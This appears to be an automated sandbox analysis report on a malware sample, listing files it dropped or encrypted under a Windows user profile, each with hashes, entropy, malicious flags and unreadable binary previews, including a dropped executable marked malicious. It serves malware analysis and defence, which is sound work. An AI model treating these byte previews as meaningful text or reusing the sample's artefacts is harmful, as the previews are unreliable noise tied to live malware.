                                                                                                                                      Preview:%!Ado....O......|GJ........y...>.8...2v.z..?..{.g..kW.P.8.]_2`Y......%.6?3.../.A\.%.da..&...5...X........'.......e.&e...s...c..6j.D..'0.nq.R....Y..|{&..D.B....i..T&.e.sg...,....9.e.w...B...;.7...\..G...6.....x....c..C..Y..<....U.5t.T.JI!.".KNy1.O..N..4......?.c:.T..V.v<.`_.Q.R...$r.*._.k..l.l.[.4....[x .).M...I.M.6.u.. .I....C..g.Kk..SF....f.x.u.|....&X..B.,~..d...Q..q.QM.^..S.b.=^'.9x...}.....e.K..P...p..gB...1.x..0Xr.9.LV.[I..R\x.t.dS..?Cv.hK7Zs6y.......0...I..Xx,5..}.G....d.{.0. 9.8*9;.+[.z.......;..}.N+U~W...=t......a..\.<....5A.c..w.t...J...V....4.V..<w.-.....V@zt9R...b.r........C.TN.:..0d....|dV3.]d....o..3.....(..;......=M.e....!l...i&;H..Cy..p....gj7...o.."..u...$Gk`....(.N.,..n- .Q.m?..^.!A.i.2&......n.F...^s.]8.O.....BL....i.}D4....d...'7.....O..'ojb...4.../..I....p..W...+'Q1~S...V..kO:.t.q...s.......-M....$.tjR.II.`...`.uLR.p.F5..<..2.}$...z'U7i...1Yx.,25.`..%g]...<D;.Tqr.Qq....Z>....gM;S..K~=.p..n....n}U.d3...=^.e8...Q...pd

                                                                                                                                      C:\Users\user\Local Settings\Adobe\Acrobat\DC\IconCacheAcro65536.dat.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):206549
                                                                                                                                      Entropy (8bit):7.250798585546882
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:xeEt4/c5LbL+LU4ygOxZNPDsm5iomRSRfQdn8FM81jwFzFHoWiRnB:xeEecJX+LzyXPDdHRfs2D1jOSnB
                                                                                                                                      MD5:6C69420836C8E802B056E64FB85501F5
                                                                                                                                      SHA1:589D5010C9837B0529E0ED52A09FE827AD32BA42
                                                                                                                                      SHA-256:9D6313EA3B73B812860A94C12627A3CFA06C4C20130ECF68E0A6B394228804D6
                                                                                                                                      SHA-512:C85DE2C8D9A3A164820E03E7400E6F481A6B3A673382A256D66DBB44D134E0CA1F0849F76B81F9534EB29DF23DE243AE191D7E15A5FB31A24EF21A228BB83E82
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:Adobe....].l6...J2w..v...2C..'...A...@#..<.r(y.......M<....T2&.F..(........T..Ho......|=r..yM6j..z.n...%.~...8......d.p..4.;o.Q.Y.t..v.cX..a..g'..Vs..54.'KA..f.>.G..4.{o.5....b9h5..QI.7<....?../..P........0d.*..365.:...2..e.#...O.A...D.'......}..|..m5.p...).....|..nl.E.....Q..i./...<*...z....!...q.c......g..(7{..+dq. .mf.99...q.[...@......A!..V.e.qTZ.L..A.4..-.j.9..u..0Wm.Zd9.r....%w.<S.1......./...a......o.2D_p...E..R..]v.........:,r..H..e...D."|.!.`3%.....(...o.I;..u.*ax.........p.+.t8..s.u...0g..Z:k|....`..r&.......Ce7*.|`a4:.6.A..K..../.].d.kGq......Z...."..[..E...z.w.F<...&4..L.5 .Mw...p.Vt.9..i_.J7..)...._........G.m.x.q .0..N..Z>.........Z..ej.n......x..."..W.~GE.e.6@......./....j..O^D.{A.q.<8..=eZO.&....F.0.pAd.9.M.'5.z2..E.e..L.9.....9..ogs.|......n.. $no..3.?Gn.o.l..#.....i.<.uu.......#..."...>Om?.p...<...HBE..{.h.h....~%.%Ra2.q.....2......~.D...E5..zS) .`.g@X.-...E....... .x.h.;|......s.>e.x.c.F...uQ...)5V..+...sD.......66....

                                                                                                                                      C:\Users\user\Local Settings\Adobe\Acrobat\DC\UserCache64.bin.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):67060
                                                                                                                                      Entropy (8bit):7.99704831469149
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:1536:BqS3rxWgQqlogm39Qmpg6UIGRtArH4ODdnLP:dTQRmWg6UxtHOD9
                                                                                                                                      MD5:5689D610D4DD097422ED691C4FF57740
                                                                                                                                      SHA1:C556E8D605E76FE2DF5FD4DE77204A810EF21502
                                                                                                                                      SHA-256:ABF03DE2E292228B65A5E596FA54F38C4C5731A7FAD1C0A545B608D51EA81796
                                                                                                                                      SHA-512:784A8743FF7CA640E581313B5734E9133C74C2B92DFA67819D6F54C359F0EF87EC53FD4A9B2483F1CEF7675E18DE4C1361770D643F62A52624C94EDF9C00FC4F
                                                                                                                                      Malicious:true
                                                                                                                                      Preview:4.397u.4..6/.y|.@-.uTkn.?2W..>.@IC...5KJ-s..]...'.7...Z..BjGO|..s.T.......'d........NB.b.GX.}..R=..X..:J&....F.J....u......3%.....u..~T.@.[.3.P.m...lAe. .....w....E....0.-..c.4.|(..w..!...R..#......u....M.8.......p,T.X. t....7.RW*WoS....V%...^g9...5..F8Y.4W+`..V%.h.u....DF.>V.&...u..m..G&.{hq..5rg/.[}..M.....^.._j.M..4}...z.]5(...8U.4...~.2E...........OL.w.f...NX.....-...WlZ.]..6....Zg07..../.....'..w1Y...1..e.l....Ywr..*.W.z...eR.TJ.....]..Z}......k..F...Z.~^\.......+,..9...u..H...[.......!lN....NFG....}...x.6.....M..P...rp..zfOE.:.`{]./.....j.KR....Zn4iV;,l....5..."Lf.r..H2.WsY.n#....u.L..Z...W.....G.._.Q.hIX.'...^.\.....,...|8.srZ.f...n.O...s.c..x1..nu.u*k...M3...n..g..P.]...J.....'..L...Yp.?,...a..M?V<.....'sp....>.X[.`i*AB9.K'......\.>..N.8.R..1......]/.XG..p.T..3..[.Q=S...+....._..A.q/d..(...$.4.y..i/..Bn.&t.x.A.g..e...1..GU..)*hs.}b.....S.\=b..8.0.....^...kM|[[B.q.i,o.6...1.C.a..z..'oJ..U.],.d...'.g.pa..d,*3\U....<.!..,.6...5@

                                                                                                                                      C:\Users\user\Local Settings\Adobe\Color\ACECache11.lst.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):932
                                                                                                                                      Entropy (8bit):7.761273053266735
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:mgWc3f11zl4dK7MdMo4gqJ5wuCJoXe9ydVcz5rH97jHV9RoH7kUvE/luAtukIciD:mUh4d8N1Jz2Bdf19RoHgUvVAqbD
                                                                                                                                      MD5:57CE29E4A8C910A0A5FAF38F0328F69E
                                                                                                                                      SHA1:C872AA3071987F0D3CC594D2CFC337B08D0D3D48
                                                                                                                                      SHA-256:254D0E8A32AB2F375856A080DE0C4725CDD656E024C8C18ACAA318CCB2791A32
                                                                                                                                      SHA-512:22777FE7B44290063DD7BD16E1709B1A08BBC44B8AC5387142AFAD66ADA8DF95E2DE7315F0974BF84F9452BED562498DF8DCFBE428D317147572FAA84681B22F
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:CPSA....].Z...=9..l...Z.v.C]..h.y..H..9...... ..Qm.+X+.R...n.g.%.Rl.TZU.sgL>..k...Re..$Z`.l......Y....A..w....2..'...uf.-.k.+.....N.?b.;...Z.;....r..8b.......^i.U.x..r.....[.....>r.8...n..rC....o..4}i.[c....uP.t......1....Q..n....!...`.\.5h..D..Ya..hJ..B..S{..D..Z.`EE.._....&.Zy.L...?...;./.g.?$...AH...Q....-M63L.%.#.ywC.ux.......!..p.<Y.......>....v...<.}un.'R....x'R....1-P[..#w2O.......#..K....W.O.[...GSL..XOE.YO{fih@......+.%.9Q.B.S..e....e.#.*....n)K..7.{p.Q.\H..i...:`.V.fx...f.\..<j..../...I.]/..d<...,`.~2...I...P..F~.Rg..^..q..7{.X.. .....9..'..Er>..Y.0.@b1I..y.'9.. .u..)...U..t... .wr..g.....{..=...?.2w..-,...MP..jt...SNR..c..E....04..L..\)..f..5...N..F.0F.,.T2..(.gS.,7.S.65Zp".I.sl@....C[...cL.jL..........u.....@.qe.L%m.1..R.Lx.....|D.........E._4./..3s./)...fX.>[..iL.<...^...&..X...ty*\\.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\Local Settings\Application Data\Application Data\Application Data\225a7e21-4654-4142-adcf-9fa08e829768\build2.exe.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS-DOS executable
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):296782
                                                                                                                                      Entropy (8bit):7.620856117676261
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:13QHJFla1q8dXCPV+jo61UzBVIYA6iQeIL8EX:13wFl2ej61ULLfX
                                                                                                                                      MD5:959C2CE8C314373A333D9E228D07515E
                                                                                                                                      SHA1:9CA9AF5F9038E1EAA0ED1953A60465139A461B05
                                                                                                                                      SHA-256:A153E97485B1501A61C22C979B6D5D1B0B12EB176784E291D5818C5561F58268
                                                                                                                                      SHA-512:C7CE535145A0AACB415FF47AF9BD3E4D5373CF107EEC837879ACC26EA043D85E69785929A554FD453526A101F3E4BA0EBFA5A42CEFBD3DA8B318A813372AEBC9
                                                                                                                                      Malicious:true
                                                                                                                                      Preview:MZ.......B..%...,.'.y.N.J.9)|...J.B......+q.a.W......N3:.B....C..7..5.....0.....Ga..j&...o...0...Q.u.G.Z...>Z..2G+......O`....=..........T.r!..:....x4.S..u..0.h......U.Waj..d......`..m.}..*..JKzDm:G7..................W.....dA!...Z..|.........6......./...........5....K.u_....e..P?p..[s.5[...r.......[6..e.3&q%. ......)..El.Dr........s.....H.....&.%.g...4U..lM.).8..yNeb..w...>....D....+...W..l..g;.~..Ov."....E...5..V.Z.f@KF.O.o..0.`..&.n......P!..`....l.k.~.LU.9jW.H....'N.K.`..%#.df...`?...Y....^...I.....3..=.y%...:M!..n.v.".3.l,FD.8..........$....D..9.2Y{Enk.iD{...b..Gz.+...A.'4..Rk.*.3!..;...NA....8.?V..b..E.^....2.x.f+{.v. .WB..m'.r.u2k.t.G..cuue..~\G.}..........O?.J......'(%.&_C.qB.,.C.;lr0(.aEa.d/$x.mU..p..e.h.K..k|M#.w..6...x.o.....1..2t+m83...(Q.....4.....S*.-.k5i.Q....,.............>..j.M.2Q.LX...H..-.f"g.B....O........%;...w..{*H.7.c.....C..&r..n..../.......r.g:.dy*...WI.*&.CG.jC$....>..({PF.EpFz..l.[g.d..{#..g...S.._.g.[.@db}.X

                                                                                                                                      C:\Users\user\Local Settings\Comms\UnistoreDB\USS.jcp.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.976245177598905
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:1svx29eYe+av6TGL/2fk13mz3QsPx589yvItTvPlc2666qP:1s5pYe+av6T6eA2zgF2Itztc2/
                                                                                                                                      MD5:BDB824342BA08D3CCBCB6ADF715953B0
                                                                                                                                      SHA1:623C8BE42EB7FB62C36BD1E24CD16786C7200783
                                                                                                                                      SHA-256:D9E12397A3118D7D4EF7AB4CACA4741195B1F44E9108BD89CEABBB2DC11E1C41
                                                                                                                                      SHA-512:7529B96716F49CC9DB2309E826798E1743575A050C4DF5537051847ED3881014C43135418637143E8DE9FAAF90FE02E9D0FA58B3B24BDC79A07B84852C308F6B
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:..$a...e@.t.x.8.....g.a.d........O|.K.g.e.....^.....m..*7....Gv...G%1@W'.........g..#..2'i.V......F.'=..\.B.K......l..).X..&.c0..*..kU<Vx?.R.WY.....EIw..h...x..!.c..G.x.Nd~x.\Q?..:X..( {.lK...~J...3....r.....( .........{...~.x....G.xXvb>..?.#R..R.....A...a... +q...*>S?.I....i........LLcN21)?.E.5.dJ9<..v..........T..2....K^..b.,.$.\6.3.i.....tNe%....f]#..&'4R..F......G..........8..DJ.......$u.J.be..F4......W`P.Uq.....O#kw.....E...J...1:....A.....2..Z.o.+../..*;y.c.....S..P...W(.^..'.d.~.#..?.r...y|.@k!^."Y..]e..:....)Z.'....H.%_/DI.........qwE....M``i.N...T.U......QxU.wzrV.H..n..n8.W.{..."..y....5o..r.......5.....W..KVTw.(..rG.#..QqZ...K...X..x..K....G.Z.u...K(C..B.}3~.[.6...i..t..aG.N6.)..h......^`.h<R.+\..2.8...+$.l.|>.gqbl....Zj..5.t.....JF'.<gD.|(.T-..pY...CR.%...X.BTN...LJ..R..V......Q\+.z......Kb=....a.2..Do..K......D....?|t`-.|.W7..}L....j.R.\~@..0m.A.+r..=0..5a....]+2i...{C.L..D......-.h..Fhd&........@@:...^EO.)...z..z...g k..L..

                                                                                                                                      C:\Users\user\Local Settings\Comms\UnistoreDB\USS.jtx.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3146062
                                                                                                                                      Entropy (8bit):1.730808438843662
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:E+GNXxcK414IX/WpAGMzUdUMg3Wg+bq4JyRROYBVftDFVZU5J3qh+AJ3TGXZAcbw:cBNGX+pAGE/ohuBy+
                                                                                                                                      MD5:FF0D3249F54DF0F69C4A666F090964F1
                                                                                                                                      SHA1:BD44A4ED6CE58698E705EC53DA8709BAA2D8C55F
                                                                                                                                      SHA-256:1EF830674A2242E2BA17BDEFE3BCEC26B0157C76088994016E5D70682CBBB16D
                                                                                                                                      SHA-512:08793195C888317CE6C27C1590CC545DB458FB09EF93CD010C68D874B2E24D481EE2DA893B0188A636263ED9BBE93BA862DAF462F3D5864FF7EDBBAF477BAB01
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:6G.r.U..(..h.~Bz....B..C.J.$#u*......h.L..5gt.....5.z]#fX.w3n\...i!.............-f.(..p.5.~..}....5.!>.)A(..d.I.d..*y...RT.r....-."]+.<.../Z]..C..'......z.@X?.M...k`.y7:..Z..iQ`w/.n.t..B>y....Q..LA>...b..}R@+/2.:..!..OX....kRc.. ..7.h..*.y..C&....$.tAX.^s.M,.....t.P..I.t.....DW.Mk....L{3J\lI.....!.>.E....<.._a....40.v...1.J.)[.!@.W....4..\...........(a..Sz.+kXh..Un.....0Lo.8.....q...pu..=....wU...E.....T......!U?.K&k.{,'....Qe...j.P...T.O.i..t.a.OG.......'..#3..k|.....Qa(."(w`%'=..H......s...... ..z..8Kj.-lw.g...x.!..%...:..[.......]>..a....xz..d...#.\.>n.d...8I.l..U.e.......F..q......$...X...."V...[.Q..@...}..OO...?.@Y..H2y....pb...X.I)...e...Y.|...%...:.S.)...N...K2V)c....>...z#.Q.6.=. 5o..;....eNF....c..F.W.N.7r..W.D........E..<...\.%.c.O.f....k.k.C..H.Q.{e=%....n...Ug.<..D.)D..0'.;@.N.....$..pJ..2...9X.6.....B.2...HbS.. ...u.U.4ly.|..F...4q.P'fh.........e.a...1.K...-`....... .\...p....y..q7..o.;..B.'.[..m.8z.....`:N?......W..U#s..W.w.l

                                                                                                                                      C:\Users\user\Local Settings\Comms\UnistoreDB\USSres00001.jrs.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3146062
                                                                                                                                      Entropy (8bit):0.6707572477174776
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:6JGWGizLiy22m9xh1MubYqYjxnm6fXV63OoKEKAK1+PwqFOT3DUoN3b:6JGdiz2Zz1MubYFxnpnoE+PwqET3D71
                                                                                                                                      MD5:8A7EA00FADBA58159BA9AF4A46D94A96
                                                                                                                                      SHA1:9B8991B8E871A808021E64BC2D11865B84958140
                                                                                                                                      SHA-256:AABAD3F336EBA3D1CD776E1504D41102369C02F42758EB023CE4289A71452315
                                                                                                                                      SHA-512:7260A30F465CAF05CC89930416425E4A8CEE279C1F57961AE7CF3FE624CD7437B13C80913F538F3040C79E86968303CF53DAA3680382B869966872C4C2679466
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:......W..."V.....{l.5b..d...{.($<...)..Bh=.d".E#....{.z..(ba[...j9...dX.*A.?,Dj/...#x.1b.Q...enI.?..F..e)......VB.\.O.w>..[............k.sy.....zC../..4...2^8..<....^q .....g.0.oz..^F.I.q.Qib^.$.K...... .........rV..>...._.....?HE.3.@....>...2(I.."\V.lM.4T.....%uc.n\..*6.A..._}~d.j!.......=..9.V/..>.RN&.HY..!.A..8S....X.^{..7...C!..^.........vS..g)..Yf-.[...Q[..._.@8....a...j...k....3.Z..'.{7.3...Sf..v....."..%U...v.H......,.C.%.J...1+..L......I{..I....,.V...&E.q.L....#.e....6......2k{..C....E.x.pqd.)..G.L....I.f...ce..(...mY.N..].g.......pj.../6W{RM....h..~..5.....5.vZ.T.[.l..Y.D..3..A..a.G...P.8..A....0Z.g0.}mk.!{])...(.=&.t....T.1...]%..TY..} ..e..*R0.............F.L..}`.aS.3...".c........;.S.i..5.rz..C.A.w..L..m...$..MtjF..P..=....:$.wv:... ..../...<..+$.B..p..}5...=8....b...}..>5.z.....8f...X.D..Y...x.].g.a.]...7.d.....'.9....?..F......>..&.>.+......"$/...._.8$.g..........O..H.40S.|e>.R...D.+....7..5{.:sp<..).B+.3..e.Q.,..

                                                                                                                                      C:\Users\user\Local Settings\Comms\UnistoreDB\USSres00002.jrs.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3146062
                                                                                                                                      Entropy (8bit):0.6707617718627839
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:YETbOSkQANR0fh/fJYVFgE7VGOrtzTyhVEyLflbVRrhw9jA6Oy2tt0o2:Y28QvfRJYVFgmjJnaE4tbxwtAEIqb
                                                                                                                                      MD5:E06158FB6BB7E9D3A92E15F100DE777E
                                                                                                                                      SHA1:E7C36F269CFB770968D2644366D86F8C8E3BA506
                                                                                                                                      SHA-256:DB4944647934C0C33B3FA251B8A85C784D70C03A5A1FCEA080EFFBFB866020F0
                                                                                                                                      SHA-512:7C53188EFB8FC6BA8E1183299C08DC060A6AA676B12A55ABF401027ABE1EDE9FB821F98925390760538E0C6A79ADBE6193D8BE9A82B48CBB10BACBA9E9B3F5E7
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.....W<Y......@.Qd...#.....g.,....5.R*.F.hI..L....M...'.>.@.t...\K.9.Q.9..q.@.c......cM.1dh5.4..).DX..\.BZ.,T.9.....z{.......j.=.....IL..]........N.l....e.TG.0.3...%.....4..?..u.n]....@Vq...#.N+.......C.R.0...f@o..\..\uq.^...&z]IP.V...D.....x]^............Y..$...~U..Tz.3........0z.........;9..J.w}g%D...\jE.U[.2.VEXt....N..a.-.O..o.....F..]...ja.kj..E....V.....W.r.P.G....u..X.c....w.D...h.>xj....~.........S..__..W.K....Axg..O6.*g_.j.Y...+..c]..H.*.]....VK.Q!...:...G....4R..1J].....8.L...:|..R.3.]4I*.b/...9n...R...C.\.X.56...#0..t.tg.H]w..};....`..9~i...aD.%..c.C.......=.kP.:.......F...qK...81....p,A.&..Cn.X.S].....m^, (wxh..X-^o}G.H..^..9Nd.....t...9.~.j..s..I...:....z#)..?.R.$.F.J.... ....7..i\yl..C.]..~...xVW.e}.&8._o...{^........D._...#..x.V(~ '.V..L..W.......U.!O'B.1....&.*..8Yj~.. y>.=....!4t....eu..#..W.M..D...y.gP,...0 2~....3..k.......4.....T...E.&..t.#p...".g.Kn.n4.CX"d.v......I.g....q?..A.............9\..R.....b..n...%.j.

                                                                                                                                      C:\Users\user\Local Settings\Comms\UnistoreDB\USStmp.jtx.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3146062
                                                                                                                                      Entropy (8bit):0.6706687989767469
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:2WiAXLd0VSxlYh2wn84Pr4JSHsO2pF2znqFv35OfviCo/Xao:DiAXZ0VQ4jJsO0F2+Oq/Ko
                                                                                                                                      MD5:8C548C9BAA222E4AE0E34084C3D57F22
                                                                                                                                      SHA1:0FB35EB7A26FFF17DA9E836648E4628F0E72D233
                                                                                                                                      SHA-256:32934A475758E575B446210A6A54C3D9BEFCF5411F660F112B25787D14775309
                                                                                                                                      SHA-512:6994B9E1A1F4E57DE2D07B667138895B222FBD063EEBC5EDA314E59B223C26B32CE4783F84B5052283EFE7F9E2E4700E1F456545F306DBBE6AE5FA94D5328EAC
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:......K....~,..E...-...a;.c.....:b.65;.6.}....OYMK#..*......<..A.y...!...0.ID>.k.V.8...8..E.'0b...;9.-c,:......)... .{..e(OA*.@s.Dv] .....{.E.@..0.?d....].......T.o..@'pj.B......uH..h[..waK.bPb:.q.ROi...*...A1..........#..4...r..t...o..3.=C.W.@....T_....Y...T0..m....Z0.a.~_."..v......{..]<...P.}.R"...(....z.T..Bp..\..L.....kb........<...P7..k.<.......|.Gs.{..u..^....12..G.kUH.(J..../`.(.5....t...#<j....?...6p.l.g..H..8U..T'...v...84....H.M`M...;.3s.B.0..(. ..D..\...=.Qp`v...}.../.'.l.......M.T03......*"ZG#,.l.#..`.9.....#.8..]D.q+'....2r.. .:`_9..........`._.2..H...R...6.4...'..O.25I.Y../'?..&..._...S^.u..x.EJ.X<g.W.......{Z. M+y.G...*!...p.<.2$.{k.t...5..$...l .q.w%...G.`B...*..E.|..c....Y..R.+.P..D.o1{.....,..k3E..."KM.`R..9.....Z_f..a..x......,v..n..].jy.6..:..*.[.^n-K...%k.......g..~j.x.".)...v7.9$@..E.5.v.3..)....b.S..z.t....Y``W.....P.{..&..Yk..#8.........N.bQ....|.UN.v.T.0...B....IeSg.1...'...._=)^.)-...|].~_...{.h.&..RQ..q.

                                                                                                                                      C:\Users\user\Local Settings\Comms\UnistoreDB\store.jfm.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):16718
                                                                                                                                      Entropy (8bit):7.9890627275317305
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:384:TOeA6OLWZwTdZYHjEusYnY+eBKkK7HVZH8+743OtiFtKTf:TOeA6Vu0jzsqv7jH8+743OcFyf
                                                                                                                                      MD5:CDF25DA7A1B9111FBA65E9ED10B3172C
                                                                                                                                      SHA1:D5CC59F011588BA9816AD26475359A6C44F886C7
                                                                                                                                      SHA-256:358C66CCE9231AD1B4A40A7DE0FE484AA2C64EAF71BC582E8F72E6F26D8D7DBA
                                                                                                                                      SHA-512:8326E8C0D9BEBF0035360362D0899505DDADB9976A019BEC8E0A628361B5F8D0309C60EFC86A18162AF936153C03E168201B42E79CAEC0002D8F627C2AA36A9D
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:e.X...s#.........>.`fr.Z.......'.u.,&z_.*..`X.....K............&..~.|..z.5..>..&.Q.ea..`.x..%9....0..s...L..jk...e.|..Y..@...o.:.........-...|g.....)....+..../.4#..%...]j..9@.x..Vdp.Q.=...+K.`......R .=...n....qS.6.....b.._....V..j^:.8.O......../.....B0.Hx.......usK#....,....4O .M.W..M.... q...'j..L..'W..;.X[.......Sfm<.....m..s:|...AOcl.LM&T..@...b....8.Aw.Ca.+....s....U..U.7.Us|L...W.x._>.4w.J..$.s....YS.g../.K..-..L.Y.r.m2R\.m....).C.O......|..M.2...(6..'......./..z.t..e.5..4Xc"........5WWa.Ca.........'..*..=.......=#7.Qb....;..L....=.3Q.^.~J.............D..=MHz.].,.Z..+.........NC%..s.$#.1...%..}.:.+.......~e...........!.,...U\.....&./..v_J.zr..8......zzf...b..S9q..%..........f{.P.]......j.....o.*H}..F..F.".n..e.].#..E...H....+....2.nO.Wh.V._.E.......:........I6D..{a...... .J}.2.d9....^&..'(....V.\.5.&.....".0..)e'.....`P5[.*.#....1.6%.w.T4L.......!...d...$Wn..K.;(....*mc...<.d{....U..._w.|i.8f....?.x~L.C.FP...6!..$S.......]!T

                                                                                                                                      C:\Users\user\Local Settings\Comms\UnistoreDB\store.vol.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):6291790
                                                                                                                                      Entropy (8bit):0.44060106936652915
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:9d/uf3g1A6hKTJbWMx4STbKYxumrfDZMykWUnaCfYD:fufw1/KZGYLVMtF2
                                                                                                                                      MD5:5AB89E1E122454B32FBC6300A571E429
                                                                                                                                      SHA1:8F3B260A18864CF1A41A6C65236D91E20F137A62
                                                                                                                                      SHA-256:F5C568D6ADCBC1623A990916EDEAFB555CBDE49D863FD438BF5ACDF3B14A549E
                                                                                                                                      SHA-512:AF4F6EF904B0E59EB7EDC50177AB7D28885AE11A1EB70F624D8E68C0D17C219431E836EC6DFC23FD79EC564B1ED114AB70097E8AC3769DB08C27DA10F828FF2E
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:?E...l'.M.!....b..jQ..qd....QA..cX.-;.".nt..RGD..S|.X~...6^...T.G..O.D.m..)x.w.z...,7.L....LI7[.........g!....Z..M.p96.?.Q.W.r.5.cF...h.....e.O..[}..../..phK..3(.....I..\..w..}.O.Rf....-....8....s......<...0.KT.p.l.1a+ .q...-...V.B.5}F?.ya.....(-_....9....;'{.\.s@.h...;....q^....}+.-..suY.7j..x......}.9......)..S*&.J..t...6...j...*........&3I .:.ua..m..>.M...8l6.....\.O:.D.X.E..>rQ..>.nM...r.[dc.)Z.Mz.lO^..q.......^.]....;..\O......H..s.hf<...;..&yZ....xH.T..e.v..U.....\oCf...-.\...HB..ANP..kG.:.%y8n..?\..X.3...+|...s .G...U.S/..S_Q.e..L8wX....]...My. ...T....*./.6..0$.....si.OEr...mYG.2.w5)\...e......=,..IDLYI..u=J7+k...F..;`z.....3]......z..rN.-..(]...;.B.a.K^#.._C.(....2.m...[GYa.Z@.$..[.(.L.Rq87..#.. FOUy.v...I5..zo..... 1B_m{...Y.BP.P,....l........._6B.k.d...GL..."........(...P..Tu....soN.>T..]\..E....].....L.%.C.(.SW.C...x[.i.21..MX.....}.QF..*..9.@....Z..S.8fr.K..f..?...%c...+.B...b?...-....Q..J..t!cj..f........@f..c.<.sa..G...s

                                                                                                                                      C:\Users\user\Local Settings\ConnectedDevicesPlatform\CDPGlobalSettings.cdp.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):5200
                                                                                                                                      Entropy (8bit):7.957401659329865
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:O5V2uBqAp0SxbnQtkCjVc0ig94xpGO+FRrH9zGF36P+qCt00rHkQ3Y9m:O5VlZp0Stnj0igmxpGO+fHJwq3h0r5Am
                                                                                                                                      MD5:4B124D772FB4683B940BDF03BAF50E89
                                                                                                                                      SHA1:02C2F1CE17B838FE49ECC91A0F9232312240D774
                                                                                                                                      SHA-256:4EAF4E40BEB142FF7E7424ED731962BC4640B32CC53118252DD7D222BB302124
                                                                                                                                      SHA-512:0B9FAB76EA19CDB8B4DBBA0DBD6A54C693F157B323E5C873C10B3A611FE4CFC19C4221447ACC0802302C9F992BDE2B44CE672D514D2036E57F963AC0D9305A38
                                                                                                                                      Malicious:false
